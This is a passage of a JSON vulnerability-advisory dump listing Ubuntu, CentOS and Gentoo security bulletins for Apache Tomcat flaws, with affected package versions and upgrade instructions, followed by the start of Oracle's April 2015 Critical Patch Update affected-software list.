"ubuntu": [{"lastseen": "2018-08-31T00:10:27", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2014-0033", "https://people.canonical.com/~ubuntu-security/cve/CVE-2013-4322", "https://people.canonical.com/~ubuntu-security/cve/CVE-2013-4286", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-0050"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "13.10", "packageVersion": "7.0.42-1ubuntu0.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libtomcat7-java", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "6.0.35-1ubuntu3.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libtomcat6-java", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "6.0.24-2ubuntu1.15", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libtomcat6-java", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.10", "packageVersion": "7.0.30-0ubuntu1.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libtomcat7-java", "operator": "lt"}], "description": "It was discovered that Tomcat incorrectly handled certain inconsistent HTTP headers. A remote attacker could possibly use this flaw to conduct request smuggling attacks. (CVE-2013-4286)\n\nIt was discovered that Tomcat incorrectly handled certain requests submitted using chunked transfer encoding. A remote attacker could use this flaw to cause the Tomcat server to stop responding, resulting in a denial of service. (CVE-2013-4322)\n\nIt was discovered that Tomcat incorrectly applied the disableURLRewriting setting when handling a session id in a URL. A remote attacker could possibly use this flaw to conduct session fixation attacks. This issue only applied to Ubuntu 12.04 LTS. (CVE-2014-0033)\n\nIt was discovered that Tomcat incorrectly handled malformed Content-Type headers and multipart requests. A remote attacker could use this flaw to cause the Tomcat server to stop responding, resulting in a denial of service. This issue only applied to Ubuntu 12.10 and Ubuntu 13.10. (CVE-2014-0050)", "edition": 3, "reporter": "Ubuntu", "published": "2014-03-06T00:00:00", "title": "Tomcat vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2013-4322", "CVE-2014-0050", "CVE-2013-4286", "CVE-2014-0033"], "modified": "2014-03-06T00:00:00", "id": "USN-2130-1", "href": "https://usn.ubuntu.com/2130-1/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "centos": [{"lastseen": "2017-10-03T18:26:03", "references": ["https://rhn.redhat.com/errata/RHSA-2014-0429.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "packageFilename": "tomcat6-6.0.24-64.el6_5.src.rpm", "packageName": "tomcat6", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "packageFilename": "tomcat6-servlet-2.5-api-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6-servlet-2.5-api", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "packageFilename": "tomcat6-servlet-2.5-api-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6-servlet-2.5-api", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "packageFilename": "tomcat6-javadoc-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6-javadoc", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "packageFilename": "tomcat6-javadoc-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6-javadoc", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "packageFilename": "tomcat6-lib-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6-lib", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "packageFilename": "tomcat6-lib-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6-lib", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "packageFilename": "tomcat6-webapps-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6-webapps", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "packageFilename": "tomcat6-webapps-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6-webapps", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "packageFilename": "tomcat6-docs-webapp-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6-docs-webapp", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "packageFilename": "tomcat6-docs-webapp-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6-docs-webapp", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "packageFilename": "tomcat6-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "packageFilename": "tomcat6-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "packageFilename": "tomcat6-jsp-2.1-api-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6-jsp-2.1-api", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "packageFilename": "tomcat6-jsp-2.1-api-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6-jsp-2.1-api", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "packageFilename": "tomcat6-admin-webapps-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6-admin-webapps", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "packageFilename": "tomcat6-admin-webapps-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6-admin-webapps", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "packageFilename": "tomcat6-el-2.1-api-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6-el-2.1-api", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "packageFilename": "tomcat6-el-2.1-api-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6-el-2.1-api", "arch": "noarch", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2014:0429\n\n\nApache Tomcat is a servlet container for the Java Servlet and JavaServer\nPages (JSP) technologies.\n\nIt was found that when Tomcat processed a series of HTTP requests in which\nat least one request contained either multiple content-length headers, or\none content-length header with a chunked transfer-encoding header, Tomcat\nwould incorrectly handle the request. A remote attacker could use this flaw\nto poison a web cache, perform cross-site scripting (XSS) attacks, or\nobtain sensitive information from other requests. (CVE-2013-4286)\n\nIt was discovered that the fix for CVE-2012-3544 did not properly resolve a\ndenial of service flaw in the way Tomcat processed chunk extensions and\ntrailing headers in chunked requests. A remote attacker could use this flaw\nto send an excessively long request that, when processed by Tomcat, could\nconsume network bandwidth, CPU, and memory on the Tomcat server. Note that\nchunked transfer encoding is enabled by default. (CVE-2013-4322)\n\nA denial of service flaw was found in the way Apache Commons FileUpload\nhandled small-sized buffers used by MultipartStream. A remote attacker\ncould use this flaw to create a malformed Content-Type header for a\nmultipart request, causing JBoss Web to enter an infinite loop when\nprocessing such an incoming request. (CVE-2014-0050)\n\nAll Tomcat users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. Tomcat must be\nrestarted for this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-April/020265.html\n\n**Affected packages:**\ntomcat6\ntomcat6-admin-webapps\ntomcat6-docs-webapp\ntomcat6-el-2.1-api\ntomcat6-javadoc\ntomcat6-jsp-2.1-api\ntomcat6-lib\ntomcat6-servlet-2.5-api\ntomcat6-webapps\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-0429.html", "edition": 1, "reporter": "CentOS Project", "published": "2014-04-23T19:07:14", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "title": "tomcat6 security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3544", "CVE-2013-4322", "CVE-2014-0050", "CVE-2013-4286"], "modified": "2014-04-23T19:07:14", "href": "http://lists.centos.org/pipermail/centos-announce/2014-April/020265.html", "id": "CESA-2014:0429", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-10-03T18:25:19", "references": ["https://rhn.redhat.com/errata/RHSA-2014-0865.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "packageFilename": "tomcat6-docs-webapp-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6-docs-webapp", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "packageFilename": "tomcat6-docs-webapp-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6-docs-webapp", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "packageFilename": "tomcat6-el-2.1-api-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6-el-2.1-api", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "packageFilename": "tomcat6-el-2.1-api-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6-el-2.1-api", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "packageFilename": "tomcat6-webapps-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6-webapps", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "packageFilename": "tomcat6-webapps-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6-webapps", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "packageFilename": "tomcat6-6.0.24-72.el6_5.src.rpm", "packageName": "tomcat6", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "packageFilename": "tomcat6-admin-webapps-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6-admin-webapps", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "packageFilename": "tomcat6-admin-webapps-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6-admin-webapps", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "packageFilename": "tomcat6-servlet-2.5-api-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6-servlet-2.5-api", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "packageFilename": "tomcat6-servlet-2.5-api-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6-servlet-2.5-api", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "packageFilename": "tomcat6-jsp-2.1-api-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6-jsp-2.1-api", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "packageFilename": "tomcat6-jsp-2.1-api-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6-jsp-2.1-api", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "packageFilename": "tomcat6-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "packageFilename": "tomcat6-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "packageFilename": "tomcat6-lib-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6-lib", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "packageFilename": "tomcat6-lib-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6-lib", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "packageFilename": "tomcat6-javadoc-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6-javadoc", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "packageFilename": "tomcat6-javadoc-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6-javadoc", "arch": "noarch", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2014:0865\n\n\nApache Tomcat is a servlet container for the Java Servlet and JavaServer\nPages (JSP) technologies.\n\nIt was discovered that Apache Tomcat did not limit the length of chunk\nsizes when using chunked transfer encoding. A remote attacker could use\nthis flaw to perform a denial of service attack against Tomcat by streaming\nan unlimited quantity of data, leading to excessive consumption of server\nresources. (CVE-2014-0075)\n\nIt was found that Apache Tomcat did not check for overflowing values when\nparsing request content length headers. A remote attacker could use this\nflaw to perform an HTTP request smuggling attack on a Tomcat server located\nbehind a reverse proxy that processed the content length header correctly.\n(CVE-2014-0099)\n\nIt was found that the org.apache.catalina.servlets.DefaultServlet\nimplementation in Apache Tomcat allowed the definition of XML External\nEntities (XXEs) in provided XSLTs. A malicious application could use this\nto circumvent intended security restrictions to disclose sensitive\ninformation. (CVE-2014-0096)\n\nThe CVE-2014-0075 issue was discovered by David Jorm of Red Hat Product\nSecurity.\n\nThis update also fixes the following bugs:\n\n* The patch that resolved the CVE-2014-0050 issue contained redundant code.\nThis update removes the redundant code. (BZ#1094528)\n\n* The patch that resolved the CVE-2013-4322 issue contained an invalid\ncheck that triggered a java.io.EOFException while reading trailer headers\nfor chunked requests. This update fixes the check and the aforementioned\nexception is no longer triggered in the described scenario. (BZ#1095602)\n\nAll Tomcat 6 users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. Tomcat must be\nrestarted for this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-July/020403.html\n\n**Affected packages:**\ntomcat6\ntomcat6-admin-webapps\ntomcat6-docs-webapp\ntomcat6-el-2.1-api\ntomcat6-javadoc\ntomcat6-jsp-2.1-api\ntomcat6-lib\ntomcat6-servlet-2.5-api\ntomcat6-webapps\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-0865.html", "edition": 1, "reporter": "CentOS Project", "published": "2014-07-09T16:09:49", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "tomcat6 security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0099", "CVE-2013-4322", "CVE-2014-0050", "CVE-2014-0096", "CVE-2014-0075"], "modified": "2014-07-09T16:09:49", "href": "http://lists.centos.org/pipermail/centos-announce/2014-July/020403.html", "id": "CESA-2014:0865", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:52", "references": ["https://bugs.gentoo.org/show_bug.cgi?id=511762", "https://bugs.gentoo.org/show_bug.cgi?id=442014", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5885", "https://bugs.gentoo.org/show_bug.cgi?id=500600", "https://bugs.gentoo.org/show_bug.cgi?id=469434", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2071", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0096", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5886", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2733", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4286", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0033", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4431", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0050", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0119", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0075", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2067", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4534", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0099", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3546", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3544", "https://bugs.gentoo.org/show_bug.cgi?id=517630", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4590", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5887", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4322", "https://bugs.gentoo.org/show_bug.cgi?id=519590"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "7.0.56", "packageName": "www-servers/tomcat", "packageFilename": "UNKNOWN", "arch": "all", "operator": "lt"}], "description": "### Background\n\nApache Tomcat is a Servlet-3.0/JSP-2.2 Container.\n\n### Description\n\nMultiple vulnerabilities have been discovered in Tomcat. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker may be able to cause a Denial of Service condition as well as obtain sensitive information, bypass protection mechanisms and authentication restrictions. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Tomcat 6.0.x users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-servers/tomcat-6.0.41\"\n \n\nAll Tomcat 7.0.x users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-servers/tomcat-7.0.56\"", "edition": 1, "reporter": "Gentoo Foundation", "published": "2014-12-15T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "gentoo", "title": "Apache Tomcat: Multiple vulnerabilities", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3544", "CVE-2013-2071", "CVE-2012-5887", "CVE-2014-0099", "CVE-2014-0119", "CVE-2013-4322", "CVE-2012-4431", "CVE-2012-2733", "CVE-2014-0050", "CVE-2013-2067", "CVE-2013-4286", "CVE-2013-4590", "CVE-2014-0096", "CVE-2014-0075", "CVE-2012-3546", "CVE-2012-5886", "CVE-2014-0033", "CVE-2012-4534", "CVE-2012-5885"], "modified": "2016-03-20T00:00:00", "id": "GLSA-201412-29", "href": "https://security.gentoo.org/glsa/201412-29", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "oracle": [{"lastseen": "2018-08-31T04:14:01", "references": [], "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n \n\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n \n\n\n**Oracle continues to periodically receive reports of malicious exploitation of vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that malicious attackers have been successful because customers had failed to apply available Oracle patches. Oracle therefore _strongly_ recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes _without_ delay.**\n\n \n\n\nThis Critical Patch Update contains 98 new security fixes across the product families listed below. Please note that a blog entry summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at <https://blogs.oracle.com/security>.\n\n \n\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available at: <http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>.\n\n \n\n", "edition": 3, "reporter": "Oracle", "published": "2015-04-14T00:00:00", "title": "Oracle Critical Patch Update - April 2015", "type": "oracle", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Oracle WebCenter Sites", "version": "7.6.2", "operator": "le"}, {"name": "JD Edwards EnterpriseOne Technology", "version": "9.1", "operator": "le"}, {"name": "Oracle Outside In Technology", "version": "8.5.1", "operator": "le"}, {"name": "Oracle VM Server for SPARC", "version": "3.2", "operator": "le"}, {"name": "XDB - XML Database", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle WebCenter Sites", "version": "11.1.1.8.0", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "13.3", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "13.0", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "13.1", "operator": "le"}, {"name": "Oracle OpenSSO", "version": "3.0", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "12.0", "operator": "le"}, {"name": "Java VM", "version": "11.2.0.3", "operator": "le"}, {"name": "Java VM", "version": "11.2.0.4", "operator": "le"}, {"name": "Java VM", "version": "11.1.0.7", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.4", "operator": "le"}, {"name": "XDK and XDB - XML Database", "version": "11.2.0.3", "operator": "le"}, {"name": "Oracle Installed Base", "version": "12.1.3", "operator": "le"}, {"name": "MySQL Enterprise Monitor", "version": "3.0.10", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "14.1", "operator": "le"}, {"name": "Oracle RDBMS", "version": "11.1.0.7", "operator": "le"}, {"name": "Oracle Installed Base", "version": "12.0.6", "operator": "le"}, {"name": "Oracle GlassFish Server", "version": "2.1.1", "operator": "le"}, {"name": "Oracle Hyperion BI+", "version": "11.1.2.3", "operator": "le"}, {"name": "Cisco MDS Fiber Channel Switch", "version": "5.2", "operator": "le"}, {"name": "Java SE, JavaFX", "version": "7u76", "operator": "le"}, {"name": "Oracle Exalogic Infrastructure", "version": "2.x", "operator": "le"}, {"name": "Oracle RDBMS", "version": "12.1.0.2", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "12.0IN", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.6", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.2", "operator": "le"}, {"name": "Java SE, JRockit", "version": "5.0u81", "operator": "le"}, {"name": "Enterprise Manager Base Platform", "version": "12.1.0.6", "operator": "le"}, {"name": "Oracle Demand Planning", "version": "12.0", "operator": "le"}, {"name": "Oracle GoldenGate Monitor", "version": "11.1.2.1.0", "operator": "le"}, {"name": "Oracle iPlanet Web Proxy Server", "version": "4.0", "operator": "le"}, {"name": "Java SE, JavaFX", "version": "6u91", "operator": "le"}, {"name": "Oracle Applications Technology Stack", "version": "12.0.6", "operator": "le"}, {"name": "Oracle Retail Central Office", "version": "13.3", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "14.0", "operator": "le"}, {"name": "XDB - XML Database", "version": "12.1.0.1", "operator": "le"}, {"name": "Oracle Commerce Platform", "version": "10.2", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.1", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.5", "operator": "le"}, {"name": "Java SE, JRockit", "version": "28.3.5", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "12.1.3.0", "operator": "le"}, {"name": "Oracle Demand Planning", "version": "12.2", "operator": "le"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.54", "operator": "le"}, {"name": "Siebel UI Framework", "version": "8.2", "operator": "le"}, {"name": "Oracle Retail Central Office", "version": "14.1", "operator": "le"}, {"name": "Java VM", "version": "12.1.0.2", "operator": "le"}, {"name": "Oracle Health Sciences Argus Safety", "version": "8.0", "operator": "le"}, {"name": "PeopleSoft Enterprise SCM Strategic Sourcing", "version": "9.1", "operator": "le"}, {"name": "Oracle Applications Technology Stack", "version": "12.2.3", "operator": "le"}, {"name": "XDK and XDB - XML Database", "version": "12.1.0.1", "operator": "le"}, {"name": "Application Management Pack for Oracle E-Business Suite", "version": "121020", "operator": "le"}, {"name": "Java SE", "version": "5.0u81", "operator": "le"}, {"name": "Java SE, JRockit", "version": "6u91", "operator": "le"}, {"name": "SQL Trace Analyzer", "version": "12.1.11", "operator": "le"}, {"name": "Oracle RDBMS", "version": "12.1.0.1", "operator": "le"}, {"name": "Solaris", "version": "10", "operator": "le"}, {"name": "Oracle Applications Technology Stack", "version": "12.1.3", "operator": "le"}, {"name": "MySQL Utilities", "version": "1.5.1", "operator": "le"}, {"name": "Oracle Applications Technology Stack", "version": "11.5.10.2", "operator": "le"}, {"name": "Application Management Pack for Oracle E-Business Suite", "version": "121030", "operator": "le"}, {"name": "Oracle Hyperion Smart View for Office", "version": "11.1.2.5.216", "operator": "le"}, {"name": "Oracle Applications Technology Stack", "version": "12.2.4", "operator": "le"}, {"name": "Java SE, JRockit", "version": "8u40", "operator": "le"}, {"name": "Java SE", "version": "7u76", "operator": "le"}, {"name": "Oracle Commerce Platform", "version": "9.4", "operator": "le"}, {"name": "Oracle Installed Base", "version": "12.1.1", "operator": "le"}, {"name": "MySQL Enterprise Monitor", "version": "3.0.18", "operator": "le"}, {"name": "MySQL Server", "version": "5.6.23", "operator": "le"}, {"name": "Oracle Exalogic Infrastructure", "version": "1.x", "operator": "le"}, {"name": "MySQL Enterprise Monitor", "version": "2.3.16", "operator": "le"}, {"name": "Siebel UI Framework", "version": "8.1", "operator": "le"}, {"name": "Oracle WebCenter Sites", "version": "11.1.1.6.1", "operator": "le"}, {"name": "Oracle Retail Central Office", "version": "13.4", "operator": "le"}, {"name": "Oracle Retail Central Office", "version": "13.2", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "12.1.1.0", "operator": "le"}, {"name": "Oracle Knowledge", "version": "8.2.3.10.1", "operator": "le"}, {"name": "Oracle VM Server for SPARC", "version": "3.1", "operator": "le"}, {"name": "Solaris", "version": "11.2", "operator": "le"}, {"name": "Java SE", "version": "8u40", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.3", "operator": "le"}, {"name": "PeopleSoft Enterprise SCM Strategic Sourcing", "version": "9.2", "operator": "le"}, {"name": "Cisco MDS Fiber Channel Switch", "version": "6.2", "operator": "le"}, {"name": "Oracle Installed Base", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle WebCenter Portal", "version": "11.1.1.8.0", "operator": "le"}, {"name": "Oracle Demand Planning", "version": "12.1", "operator": "le"}, {"name": "Oracle RDBMS", "version": "11.2.0.4", "operator": "le"}, {"name": "Java SE, JavaFX", "version": "8u40", "operator": "le"}, {"name": "XDB - XML Database", "version": "12.1.0.2", "operator": "le"}, {"name": "Oracle iPlanet Web Server", "version": "6.1", "operator": "le"}, {"name": "Oracle Outside In Technology", "version": "8.5.0", "operator": "le"}, {"name": "Oracle Outside In Technology", "version": "8.4.1", "operator": "le"}, {"name": "MySQL Server", "version": "5.5.42", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "12.1.2.0", "operator": "le"}, {"name": "Oracle Access Manager", "version": "11.1.1.5", "operator": "le"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.53", "operator": "le"}, {"name": "Oracle Installed Base", "version": "12.0.4", "operator": "le"}, {"name": "MySQL Server", "version": "5.6.22", "operator": "le"}, {"name": "Oracle Retail Central Office", "version": "14.0", "operator": "le"}, {"name": "Oracle Application Object Library", "version": "12.0.6", "operator": "le"}, {"name": "Oracle Knowledge", "version": "8.4.7.2", "operator": "le"}, {"name": "Oracle Agile Engineering Data Management", "version": "6.1.3.0", "operator": "le"}, {"name": "Oracle Retail Central Office", "version": "13.1", "operator": "le"}, {"name": "MySQL Connectors", "version": "5.1.34", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "10.3.6.0", "operator": "le"}, {"name": "Oracle GlassFish Server", "version": "3.0.1", "operator": "le"}, {"name": "XDB - XML Database", "version": "11.2.0.3", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.1", "operator": "le"}, {"name": "Java SE", "version": "6u91", "operator": "le"}, {"name": "Java SE, JavaFX", "version": "2.2.76", "operator": "le"}, {"name": "Oracle Application Object Library", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.0", "operator": "le"}, {"name": "Enterprise Manager Base Platform", "version": "12.1.0.5", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "13.2", "operator": "le"}, {"name": "Oracle iPlanet Web Server", "version": "7.0", "operator": "le"}, {"name": "Java SE, JavaFX", "version": "5.0u81", 